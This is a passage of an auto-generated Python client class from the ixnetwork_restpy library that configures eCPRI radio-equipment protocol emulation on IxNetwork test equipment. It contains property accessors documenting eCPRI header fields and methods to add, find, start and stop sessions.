\"vendorSpecificPayloadLength\",\n }\n _SDM_ENUM_MAP = {\n \"messageType\": [\n \"realTimeControlData\",\n \"remoteMemoryAccess\",\n \"onewayDelayMeasurement\",\n \"remoteReset\",\n \"eventIndication\",\n ],\n \"status\": [\n \"configured\",\n \"error\",\n \"mixed\",\n \"notStarted\",\n \"started\",\n \"starting\",\n \"stopping\",\n ],\n }\n\n def __init__(self, parent, list_op=False):\n super(ECpriRe, self).__init__(parent, list_op)\n\n @property\n def Connector(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector): An instance of the Connector class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b import (\n Connector,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"Connector\", None) is not None:\n return self._properties.get(\"Connector\")\n return Connector(self)\n\n @property\n def ECpriFaultSubObjectsList(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ecprifaultsubobjectslist_066a935ffc4b8b88998000da08d713eb.ECpriFaultSubObjectsList): An instance of the ECpriFaultSubObjectsList class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ecprifaultsubobjectslist_066a935ffc4b8b88998000da08d713eb import (\n ECpriFaultSubObjectsList,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"ECpriFaultSubObjectsList\", None) is not None:\n return self._properties.get(\"ECpriFaultSubObjectsList\")\n return ECpriFaultSubObjectsList(self)\n\n @property\n def OranDU(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.orandu_3c913d8352aa36ef882a1ba8a0683584.OranDU): An instance of the OranDU class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.orandu_3c913d8352aa36ef882a1ba8a0683584 import (\n OranDU,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"OranDU\", None) is not None:\n return self._properties.get(\"OranDU\")\n return OranDU(self)\n\n @property\n def OranRU(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.oranru_c5d61b81f2557e778753a97ef8b7363b.OranRU): An instance of the OranRU class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.oranru_c5d61b81f2557e778753a97ef8b7363b import (\n OranRU,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"OranRU\", None) is not None:\n return self._properties.get(\"OranRU\")\n return OranRU(self)\n\n @property\n def ActionType(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Action Type value 0x00 and 0x01 are used when an eCPRI node initiates a one-way delay measurement in direction from its own node to another node. Value 0x02 is used when an eCPRI node needs to know the one-way delay from another node to itself.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"ActionType\"]))\n\n @property\n def Active(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Activate/Deactivate Configuration\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"Active\"]))\n\n @property\n def Address(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The Address is a 48-bit value. Details such as whether the memory on the opposite node is organized in one or more memory banks or whether an address offset is signaled over the interface etc. are vendor specific. The Element ID could be used for identifying a specific memory hardware instance.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"Address\"]))\n\n @property\n def CompensationValue(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): When Action Type is set to 0x00 (Request), 0x02 (Response) or 0x05 (Follow_Up) in the message, this field will contain the Compensation Value which is the compensation time measured in nanoseconds and multiplied by 2 to the power 16 and follows the format for the correctionField in the common message header specified in IEEE 1588-2008 Clause 13.3 [13]. When Action Type is set to 0x03 (Remote Request) or 0x04 (Remote Request with Follow_Up) the time information fields TimeStamp and Compensation Value are set to 0b in all bits. A Compensation Value of 0 (zero) is a valid value.Example: A Compensation Value of 183.5 ns is represented as 0000000000B78000 with base 16.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"CompensationValue\"])\n )\n\n @property\n def ConnectedVia(self):\n # type: () -> List[str]\n \"\"\"DEPRECATED\n Returns\n -------\n - list(str[None | /api/v1/sessions/1/ixnetwork/topology]): List of layers this layer is used to connect with to the wire.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"ConnectedVia\"])\n\n @ConnectedVia.setter\n def ConnectedVia(self, value):\n # type: (List[str]) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"ConnectedVia\"], value)\n\n @property\n def Count(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Count\"])\n\n @property\n def DelayMeasurementId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The Measurement ID is a 1-byte value used by the sender of the request when the response is received to distinguish between different measurements, i.e. the receiver of the request shall copy the ID from the request into the response message.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"DelayMeasurementId\"])\n )\n\n @property\n def DescriptiveName(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"DescriptiveName\"])\n\n @property\n def DummyBytesLength(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The number of dummy bytes included in the eCPRI-payload will be defined by the eCPRI payload size field in the eCPRI common header. Due to network characteristics, a small message might take shorter time through the network than a large one, with the dummy bytes the one-way delay estimation can be improved. The insertion of dummy bytes is only needed when the Action Type set to 0x00 (Request) or to 0x01(Request with Follow_Up).\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"DummyBytesLength\"])\n )\n\n @property\n def ElementId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Depending on implementation the Element ID could be used for instance to point out a specific instance of a generic hardware function.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"ElementId\"]))\n\n @property\n def Errors(self):\n \"\"\"\n Returns\n -------\n - list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork/],arg2:list[str])): A list of errors that have occurred\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Errors\"])\n\n @property\n def EventId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): A 1-byte value set by the transmitter of an Event Indication or a Synchronization Request to enable identification of the acknowledge response.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"EventId\"]))\n\n @property\n def EventSequenceNumber(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The Sequence Number is a 1-byte value that is incremented each time the transmitter sends the Event Indication with Event Type set to 0x00 (Fault(s) Indication). The receiver will use the sequence number to ensure that the correct status for a specific combination of {Element-ID; Fault-value} is used. Due to the nature of the packet based fronthaul network, packets might be delivered out of order and a sequence number is needed to handle this scenario. When a fault indication is not acknowledged the transmitter will re-transmit the fault, setting the sequence number to the same value used in the initial transmission.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"EventSequenceNumber\"])\n )\n\n @property\n def EventType(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Event Type value ranges from 0x00 to 0xFF, where 0x00 represents Fault(s) Indication, 0x01 represents Fault(s) Indication Acknowledge, 0x02 represents Notification(s) Indication, 0x03 represents Synchronization Request, 0x04 represents Synchronization Acknowledge, 0x05 represents Synchronization End Indication and values from 0x06 to 0xFF are Reserved.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"EventType\"]))\n\n @property\n def MessageType(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str(realTimeControlData | remoteMemoryAccess | onewayDelayMeasurement | remoteReset | eventIndication): Message Type\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"MessageType\"])\n\n @MessageType.setter\n def MessageType(self, value):\n # type: (str) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"MessageType\"], value)\n\n @property\n def Multiplier(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: Number of layer instances per parent instance (multiplier)\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Multiplier\"])\n\n @Multiplier.setter\n def Multiplier(self, value):\n # type: (int) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"Multiplier\"], value)\n\n @property\n def Name(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str: Name of NGPF element, guaranteed to be unique in Scenario\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Name\"])\n\n @Name.setter\n def Name(self, value):\n # type: (str) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"Name\"], value)\n\n @property\n def NumberOfFaultSubObjects(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: Number Of Fault or Notify.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"NumberOfFaultSubObjects\"])\n\n @NumberOfFaultSubObjects.setter\n def NumberOfFaultSubObjects(self, value):\n # type: (int) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"NumberOfFaultSubObjects\"], value)\n\n @property\n def ReadWriteType(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The field consist of two parts, a read or write indication and a request or response indication. The Response value 0010b (Failure) is used when the receiver of the request is unable to perform the read or write request due to invalid content in received parameters or other faults.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"ReadWriteType\"]))\n\n @property\n def RemoteResetId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Depending on implementation the Reset ID could be used for instance to point out a specific instance of a generic hardware function. Value allocation to Reset ID is vendor specific.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"RemoteResetId\"]))\n\n @property\n def ReservedActionType(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The Action Type is a 1-byte value. Value 0x00 and 0x01 are used when an eCPRI node initiates a one-way delay measurement in direction from its own node to another node. Value 0x02 is used when an eCPRI node needs to know the one-way delay from another node to itself.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"ReservedActionType\"])\n )\n\n @property\n def ReservedEventType(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Reserved Event Type values from 0x06 to 0xFF are Reserved.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"ReservedEventType\"])\n )\n\n @property\n def ReservedResetCode(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The Reset Code Op is a 1-byte value. Value 0x00 represents Reserved, 0x01 represents Remote reset request, 0x02 represents Remote reset response and value ranging from 0x03 to 0xFF are Reserved.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"ReservedResetCode\"])\n )\n\n @property\n def ResetCodeOp(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The Reset Code Op is a 1-byte value. Value 0x00 represents Reserved, 0x01 represents Remote Reset Request, 0x02 represents Remote Reset Response.Values from 0x03 to 0xFF is Reserved.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"ResetCodeOp\"]))\n\n @property\n def RmaAction(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): RMA Action Type is Request or Response or Failure.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"RmaAction\"]))\n\n @property\n def RmaDataLength(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Number of bytes(0 to 255) to read or write from or to remote node.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"RmaDataLength\"]))\n\n @property\n def RtcDataLength(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Size of RTC data that will be included in the eCPRI message.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"RtcDataLength\"]))\n\n @property\n def SequenceId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): An identifier of each message in a series of Real-Time Control Data messages. For example, identifier of message sequence, links between request and response messages,etc. Value allocation to SEQ_ID is vendor specific.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"SequenceId\"]))\n\n @property\n def SessionStatus(self):\n # type: () -> List[str]\n \"\"\"\n Returns\n -------\n - list(str[down | notStarted | up]): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"SessionStatus\"])\n\n @property\n def StackedLayers(self):\n # type: () -> List[str]\n \"\"\"\n Returns\n -------\n - list(str[None | /api/v1/sessions/1/ixnetwork/topology]): List of secondary (many to one) child layer protocols\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"StackedLayers\"])\n\n @StackedLayers.setter\n def StackedLayers(self, value):\n # type: (List[str]) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"StackedLayers\"], value)\n\n @property\n def StartingRmaId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Identifier of the request message used by the Initiator to match the corresponding response message.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"StartingRmaId\"]))\n\n @property\n def StartingRtcId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): RTC ID of the eRE or eREC.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"StartingRtcId\"]))\n\n @property\n def StateCounts(self):\n \"\"\"\n Returns\n -------\n - dict(total:number,notStarted:number,down:number,up:number): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"StateCounts\"])\n\n @property\n def Status(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str(configured | error | mixed | notStarted | started | starting | stopping): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Status\"])\n\n @property\n def TimeStamp(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): When Action Type is set to 0x00 (Request) in the message this field will contain the time stamp t1 and when Action Type is set to 0x02 (Response) the time stamp t2. When action type is set to 0x01(Request with Follow_Up) the time stamp information fields shall be set to 0b in all bits, the corresponding time information values are sent in the Follow_Up message. When Action Type is set to 0x03 or 0x04 (Remote Request and Remote Request with Follow_Up) the time stamp information fields shall be set to 0b in all bits. When using the Follow_Up message (2-Step version) the Follow_Up message (Action Type set to 0x05) the time information values t1 and tCV1 will be set to the TimeStamp field. The time information values follow the format specified in IEEE 1588-2008 [13] Clause 5.3.3. The value consists of 2 parts, one seconds-part and one nanoseconds-part. The first 6 bytes are the seconds and the next 4 bytes are the nanoseconds.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"TimeStamp\"]))\n\n @property\n def VendorSpecificPayloadLength(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Vendor Specific Payload bytes are used to carry optional vendor-specific information. The vendor specific information can contain data items such as authentication parameters or any parameters to select a specific reset behavior. This specification does not detail any concrete reset behavior.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"VendorSpecificPayloadLength\"])\n )\n\n def update(\n self,\n ConnectedVia=None,\n MessageType=None,\n Multiplier=None,\n Name=None,\n NumberOfFaultSubObjects=None,\n StackedLayers=None,\n ):\n # type: (List[str], str, int, str, int, List[str]) -> ECpriRe\n \"\"\"Updates eCpriRe resource on the server.\n\n This method has some named parameters with a type: obj (Multivalue).\n The Multivalue class has documentation that details the possible values for those named parameters.\n\n Args\n ----\n - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of layers this layer is used to connect with to the wire.\n - MessageType (str(realTimeControlData | remoteMemoryAccess | onewayDelayMeasurement | remoteReset | eventIndication)): Message Type\n - Multiplier (number): Number of layer instances per parent instance (multiplier)\n - Name (str): Name of NGPF element, guaranteed to be unique in Scenario\n - NumberOfFaultSubObjects (number): Number Of Fault or Notify.\n - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of secondary (many to one) child layer protocols\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def add(\n self,\n ConnectedVia=None,\n MessageType=None,\n Multiplier=None,\n Name=None,\n NumberOfFaultSubObjects=None,\n StackedLayers=None,\n ):\n # type: (List[str], str, int, str, int, List[str]) -> ECpriRe\n \"\"\"Adds a new eCpriRe resource on the server and adds it to the container.\n\n Args\n ----\n - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of layers this layer is used to connect with to the wire.\n - MessageType (str(realTimeControlData | remoteMemoryAccess | onewayDelayMeasurement | remoteReset | eventIndication)): Message Type\n - Multiplier (number): Number of layer instances per parent instance (multiplier)\n - Name (str): Name of NGPF element, guaranteed to be unique in Scenario\n - NumberOfFaultSubObjects (number): Number Of Fault or Notify.\n - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of secondary (many to one) child layer protocols\n\n Returns\n -------\n - self: This instance with all currently retrieved eCpriRe resources using find and the newly added eCpriRe resources available through an iterator or index\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def remove(self):\n \"\"\"Deletes all the contained eCpriRe resources in this instance from the server.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n self._delete()\n\n def find(\n self,\n ConnectedVia=None,\n Count=None,\n DescriptiveName=None,\n Errors=None,\n MessageType=None,\n Multiplier=None,\n Name=None,\n NumberOfFaultSubObjects=None,\n SessionStatus=None,\n StackedLayers=None,\n StateCounts=None,\n Status=None,\n ):\n \"\"\"Finds and retrieves eCpriRe resources from the server.\n\n All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve eCpriRe resources from the server.\n To retrieve an exact match ensure the parameter value starts with ^ and ends with $\n By default the find method takes no parameters and will retrieve all eCpriRe resources from the server.\n\n Args\n ----\n - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of layers this layer is used to connect with to the wire.\n - Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.\n - DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.\n - Errors (list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork/],arg2:list[str]))): A list of errors that have occurred\n - MessageType (str(realTimeControlData | remoteMemoryAccess | onewayDelayMeasurement | remoteReset | eventIndication)): Message Type\n - Multiplier (number): Number of layer instances per parent instance (multiplier)\n - Name (str): Name of NGPF element, guaranteed to be unique in Scenario\n - NumberOfFaultSubObjects (number): Number Of Fault or Notify.\n - SessionStatus (list(str[down | notStarted | up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.\n - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology])): List of secondary (many to one) child layer protocols\n - StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up\n - Status (str(configured | error | mixed | notStarted | started | starting | stopping)): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.\n\n Returns\n -------\n - self: This instance with matching eCpriRe resources retrieved from the server available through an iterator or index\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def read(self, href):\n \"\"\"Retrieves a single instance of eCpriRe data from the server.\n\n Args\n ----\n - href (str): An href to the instance to be retrieved\n\n Returns\n -------\n - self: This instance with the eCpriRe resources from the server available through an iterator or index\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._read(href)\n\n def Abort(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the abort operation on the server.\n\n Abort CPF control plane (equals to demote to kUnconfigured state).\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n abort(async_operation=bool)\n ---------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n abort(SessionIndices=list, async_operation=bool)\n ------------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n abort(SessionIndices=string, async_operation=bool)\n --------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"abort\", payload=payload, response_object=None)\n\n def RestartDown(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the restartDown operation on the server.\n\n Stop and start interfaces and sessions that are in Down state.\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n restartDown(async_operation=bool)\n ---------------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n restartDown(SessionIndices=list, async_operation=bool)\n ------------------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n restartDown(SessionIndices=string, async_operation=bool)\n --------------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"restartDown\", payload=payload, response_object=None)\n\n def Start(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the start operation on the server.\n\n Start CPF control plane (equals to promote to negotiated state).\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n start(async_operation=bool)\n ---------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n start(SessionIndices=list, async_operation=bool)\n ------------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n start(SessionIndices=string, async_operation=bool)\n --------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"start\", payload=payload, response_object=None)\n\n def Stop(self, *args, **kwargs):\n # type: (*Any, **Any) -> None\n \"\"\"Executes the stop operation on the server.\n\n Stop CPF control plane (equals to demote to PreValidated-DoDDone state).\n\n The IxNetwork model allows for multiple method Signatures with the same name while python does not.\n\n stop(async_operation=bool)\n --------------------------\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n stop(SessionIndices=list, async_operation=bool)\n -----------------------------------------------\n - SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n stop(SessionIndices=string, async_operation=bool)\n -------------------------------------------------\n - SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12\n - async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n payload = {\"Arg1\": self}\n for i in range(len(args)):\n payload[\"Arg%s\" % (i + 2)] = args[i]\n for item in kwargs.items():\n payload[item[0]] = item[1]\n return self._execute(\"stop\", payload=payload, response_object=None)\n\n def get_device_ids(\n self,\n PortNames=None,\n ActionType=None,\n Active=None,\n Address=None,\n CompensationValue=None,\n DelayMeasurementId=None,\n DummyBytesLength=None,\n ElementId=None,\n EventId=None,\n EventSequenceNumber=None,\n EventType=None,\n ReadWriteType=None,\n RemoteResetId=None,\n ReservedActionType=None,\n ReservedEventType=None,\n ReservedResetCode=None,\n ResetCodeOp=None,\n RmaAction=None,\n RmaDataLength=None,\n RtcDataLength=None,\n SequenceId=None,\n StartingRmaId=None,\n StartingRtcId=None,\n TimeStamp=None,\n VendorSpecificPayloadLength=None,\n ):\n \"\"\"Base class infrastructure that gets a list of eCpriRe device ids encapsulated by this object.\n\n Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.\n\n Args\n ----\n - PortNames (str): optional regex of port names\n - ActionType (str): optional regex of actionType\n - Active (str): optional regex of active\n - Address (str): optional regex of address\n - CompensationValue (str): optional regex of compensationValue\n - DelayMeasurementId (str): optional regex of delayMeasurementId\n - DummyBytesLength (str): optional regex of dummyBytesLength\n - ElementId (str): optional regex of elementId\n - EventId (str): optional regex of eventId\n - EventSequenceNumber (str): optional regex of eventSequenceNumber\n - EventType (str): optional regex of eventType\n - ReadWriteType (str): optional regex of readWriteType\n - RemoteResetId (str): optional regex of 